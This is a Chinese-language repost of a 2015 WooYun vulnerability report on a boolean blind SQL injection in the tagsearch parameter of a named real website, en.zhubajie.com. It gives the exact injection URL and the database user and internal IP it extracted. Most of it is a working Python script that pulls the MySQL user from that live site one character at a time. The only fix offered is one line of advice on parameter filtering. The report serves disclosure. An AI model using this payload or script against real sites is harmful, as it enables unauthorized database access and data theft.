记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

猪八戒网某站点MySQL bool盲注(附验证脚本)

2015-03-19 07:30

注射点:

code 区域
http://en.zhubajie.com/logo-design/gallery?tagsearch=11'XOR(length(user())=120)OR'bb



参数tatsearch可注入。MySQL bool blind.

False对应的关键字:No matched winning logo designs

漏洞证明:

猜解user(),得到:

code 区域
enshop@192.168.10.3



zhubajie.mysqli.png



漏洞验证脚本:

code 区域
#encoding=gbk

import httplib

import time

import string

import sys

import random

import urllib



headers = {

'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',

}



payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')



print 'start to retrive MySQL user:'

user = ''

for i in range(1,21,1):

for payload in payloads:

conn = httplib.HTTPConnection('en.zhubajie.com', timeout=60)

s = "ascii(mid(lower(user()),%s,1))=%s" % (i, ord(payload))

conn.request(method='GET',

url="/logo-design/gallery?tagsearch=11'XOR(" + s + ")OR'bb",

headers = headers)

html_doc = conn.getresponse().read()

conn.close()

if html_doc.find('No matched winning logo designs') < 0:

user += payload

sys.stdout.write('\r[In progress] %s' % user)

sys.stdout.flush()

break

else:

print '.',



print '\n[Done]MySQL user is', user

修复方案:

参数过滤

知识来源: www.wooyun.org/bugs/wooyun-2015-095083

阅读:108781 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“猪八戒网某站点MySQL bool盲注(附验证脚本)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云